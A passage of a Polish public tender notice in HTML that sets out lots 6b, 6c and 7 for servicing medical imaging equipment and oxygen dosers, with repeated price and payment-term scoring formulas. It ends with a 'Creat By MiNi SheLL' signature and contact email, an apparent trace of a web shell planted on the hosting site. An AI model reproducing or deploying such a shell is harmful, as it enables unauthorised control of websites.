	Xg    - uzyskana ilość punktów,
	Tn    - najdłuższy termin zapłaty (w dniach),
	Tg    - zadeklarowany termin zapłaty (w dniach)..
2.	Jako najkorzystniejsza zostanie wybrana oferta która uzyska najwyższą sumę punktów
	= Xc + Xg
3.	Każdy Wykonawca może zaproponować jedną ofertę cenową.
4.	Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty z niższą ceną (art. 91 ust. 4 ustawy Pzp).
5.	Zamawiający udzieli zamówienia publicznego Wykonawcy spełniającego wszystkie warunki udziału w postępowaniu, którego oferta będzie odpowiadała wszystkim wymaganiom określonym w ustawie Pzp, w SIWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br /></div></div><br /></div><div><b>Część nr: </b>6 b
                  
                <b>Nazwa: </b>zadanie nr 6 b<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część - pakiet nr  6b - wyposażenie diagnostyki obrazowej<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50421000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 24<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1.	W postępowaniu przy wyborze oferty Zamawiający zastosuje kryteria: 
	- najniższej ceny - waga 60%
- termin płatności -  waga 40%
a)	cena Xc:
do obliczenia  wartości cenowej oferty będzie brana wartość ceny 	brutto. Najniższa zaproponowana cena uzyska 60 pkt. 
Pozostałe ceny uzyskają ilość punktów obliczoną według wzoru:
Xc = Cn / Cp X 60 (z dokładnością do 2 miejsc po przecinku)
Xc   uzyskana ilość punktów,	
	Cn  cena najniższa,
	Cp  cena zaproponowana przez składającego ofertę.
b)	termin zapłaty Xg
do obliczenia wartości punktowej w kryterium termin zapłaty będzie brany pod uwagę zadeklarowany przez Wykonawcę termin zapłaty w dniach , przy czym minimalny termin zapłaty wynosi 30 dni natomiast maksymalny termin płatności wynosi 60 dni. W przypadku braku wskazania terminu zapłaty Zamawiający przyjmie termin 30 dni.
Zadeklarowany najdłuższy termin płatności uzyska 40 punktów.
Pozostałe zadeklarowane terminy zapłaty uzyskają ilość punktów obliczoną według wzoru: 
	Xg = Tg / Tn X 40 (z dokładnością do 2 miejsc po przecinku)
	Xg    - uzyskana ilość punktów,
	Tn    - najdłuższy termin zapłaty (w dniach),
	Tg    - zadeklarowany termin zapłaty (w dniach)..
2.	Jako najkorzystniejsza zostanie wybrana oferta która uzyska najwyższą sumę punktów
	= Xc + Xg
3.	Każdy Wykonawca może zaproponować jedną ofertę cenową.
4.	Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty z niższą ceną (art. 91 ust. 4 ustawy Pzp).
5.	Zamawiający udzieli zamówienia publicznego Wykonawcy spełniającego wszystkie warunki udziału w postępowaniu, którego oferta będzie odpowiadała wszystkim wymaganiom określonym w ustawie Pzp, w SIWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br /></div></div><br /></div><div><b>Część nr: </b>6 c
                  
                <b>Nazwa: </b>zadanie nr 6 c<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część - pakiet nr 6c - wyposażenie diagnostyki obrazowej<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50421000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 24<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1.	W postępowaniu przy wyborze oferty Zamawiający zastosuje kryteria: 
	- najniższej ceny - waga 60%
- termin płatności -  waga 40%
a)	cena Xc:
do obliczenia  wartości cenowej oferty będzie brana wartość ceny 	brutto. Najniższa zaproponowana cena uzyska 60 pkt. 
Pozostałe ceny uzyskają ilość punktów obliczoną według wzoru:
Xc = Cn / Cp X 60 (z dokładnością do 2 miejsc po przecinku)
Xc   uzyskana ilość punktów,	
	Cn  cena najniższa,
	Cp  cena zaproponowana przez składającego ofertę.
b)	termin zapłaty Xg
do obliczenia wartości punktowej w kryterium termin zapłaty będzie brany pod uwagę zadeklarowany przez Wykonawcę termin zapłaty w dniach , przy czym minimalny termin zapłaty wynosi 30 dni natomiast maksymalny termin płatności wynosi 60 dni. W przypadku braku wskazania terminu zapłaty Zamawiający przyjmie termin 30 dni.
Zadeklarowany najdłuższy termin płatności uzyska 40 punktów.
Pozostałe zadeklarowane terminy zapłaty uzyskają ilość punktów obliczoną według wzoru: 
	Xg = Tg / Tn X 40 (z dokładnością do 2 miejsc po przecinku)
	Xg    - uzyskana ilość punktów,
	Tn    - najdłuższy termin zapłaty (w dniach),
	Tg    - zadeklarowany termin zapłaty (w dniach)..
2.	Jako najkorzystniejsza zostanie wybrana oferta która uzyska najwyższą sumę punktów
	= Xc + Xg
3.	Każdy Wykonawca może zaproponować jedną ofertę cenową.
4.	Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty z niższą ceną (art. 91 ust. 4 ustawy Pzp).
5.	Zamawiający udzieli zamówienia publicznego Wykonawcy spełniającego wszystkie warunki udziału w postępowaniu, którego oferta będzie odpowiadała wszystkim wymaganiom określonym w ustawie Pzp, w SIWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>adanie nr 7 c<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część - pakiet nr 7  dozowniki tlenu<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50421000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 24<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1.	W postępowaniu przy wyborze oferty Zamawiający zastosuje kryteria: 
	- najniższej ceny - waga 60%
- termin płatności -  waga 40%
a)	cena Xc:
do obliczenia  wartości cenowej oferty będzie brana wartość ceny 	brutto. Najniższa zaproponowana cena uzyska 60 pkt. 
Pozostałe ceny uzyskają ilość punktów obliczoną według wzoru:
Xc = Cn / Cp X 60 (z dokładnością do 2 miejsc po przecinku)
Xc   uzyskana ilość punktów,	
	Cn  cena najniższa,
	Cp  cena zaproponowana przez składającego ofertę.
b)	termin zapłaty Xg
do obliczenia wartości punktowej w kryterium termin zapłaty będzie brany pod uwagę zadeklarowany przez Wykonawcę termin zapłaty w dniach , przy czym minimalny termin zapłaty wynosi 30 dni natomiast maksymalny termin płatności wynosi 60 dni. W przypadku braku wskazania terminu zapłaty Zamawiający przyjmie termin 30 dni.
Zadeklarowany najdłuższy termin płatności uzyska 40 punktów.
Pozostałe zadeklarowane terminy zapłaty uzyskają ilość punktów obliczoną według wzoru: 
	Xg = Tg / Tn X 40 (z dokładnością do 2 miejsc po przecinku)
	Xg    - uzyskana ilość punktów,
	Tn    - najdłuższy termin zapłaty (w dniach),
	Tg    - zadeklarowany termin zapłaty (w dniach)..
2.	Jako najkorzystniejsza zostanie wybrana oferta która uzyska najwyższą sumę punktów
	= Xc + Xg
3.	Każdy Wykonawca może zaproponować jedną ofertę cenową.
4.	Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty z niższą ceną (art. 91 ust. 4 ustawy Pzp).
5.	Zamawiający udzieli zamówienia publicznego Wykonawcy spełniającego wszystkie warunki udziału w postępowaniu, którego oferta będzie odpowiadała wszystkim wymaganiom określonym w ustawie Pzp, w SIWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com